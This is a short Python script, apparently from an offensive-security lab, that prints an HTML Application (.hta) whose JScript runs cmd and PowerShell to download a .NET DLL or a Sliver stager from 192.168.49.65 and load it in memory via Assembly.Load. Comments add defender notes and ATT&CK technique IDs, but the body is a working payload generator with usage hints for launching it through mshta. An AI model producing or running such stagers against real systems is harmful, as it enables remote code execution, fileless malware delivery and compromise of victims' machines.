# Prints an HTML Application (.hta) document to stdout. The document's JScript
# passes the PAYLOAD command line to WScript.Shell.Run; nothing is written to
# disk or sent over the network by this script itself.
#
# Defender notes (what the emitted file looks like when it runs):
#   * Process lineage: mshta.exe -> cmd.exe -> powershell.exe. mshta spawning a
#     shell or PowerShell is a standard detection point (ATT&CK T1218.005).
#   * The PowerShell command line contains Net.WebClient DownloadData over plain
#     HTTP followed by [System.Reflection.Assembly]::Load on the returned bytes,
#     so the assembly is loaded from memory rather than from a saved file
#     (ATT&CK T1620). Command-line and script-block logging capture these strings.
#   * 192.168.49.65 is an RFC 1918 private address -- presumably a lab host;
#     confirm before treating it as an indicator.

# NOTE(review): this first assignment is dead -- PAYLOAD is unconditionally
# reassigned below before anything reads it, so only the second string is used.
PAYLOAD = """powershell.exe -c \\"$data = (New-Object System.Net.WebClient).DownloadData('http://192.168.49.65/win_msf_sliver_stager.exe')\\";$assem = [System.Reflection.Assembly]::Load($data);[SliverStager.Stager]::Main()"""
# DLL Runner variant (the one actually used): downloads a .NET DLL, loads it with
# Assembly.Load, and invokes a static method on it through reflection.
# In these non-raw strings `\\"` becomes `\"`, i.e. an escaped quote once the
# text sits inside the JScript string literal in TEMPLATE.
PAYLOAD = """cmd.exe /c powershell.exe -c \\"$data = (New-Object System.Net.WebClient).DownloadData('http://192.168.49.65/DLL-Runner-x64.dll');$assem = [System.Reflection.Assembly]::Load($data);$class = $assem.GetType('LeMans.Class1');$method = $class.GetMethod('ferrari');$method.Invoke(0, $null)\\" """
# HTA body. The f-string interpolates PAYLOAD verbatim (no escaping is applied)
# into the shell.Run("...") call in the <head> script; the <body> script then
# calls self.close().
TEMPLATE = f"""
<html>
<head>
<script language="JScript">
var shell = new ActiveXObject("WScript.Shell");
var res = shell.Run("{PAYLOAD}");
</script>
</head>
<body>
<script language="JScript">
self.close();
</script>
</body>
</html>
"""
# Emit the document on stdout; saving it to a file is left to the caller.
print(TEMPLATE)
# Usage hints only -- these lines do not run anything.
print('Run with: mshta http://192.168.49.65/foo.hta')
print('Or dl and run locally')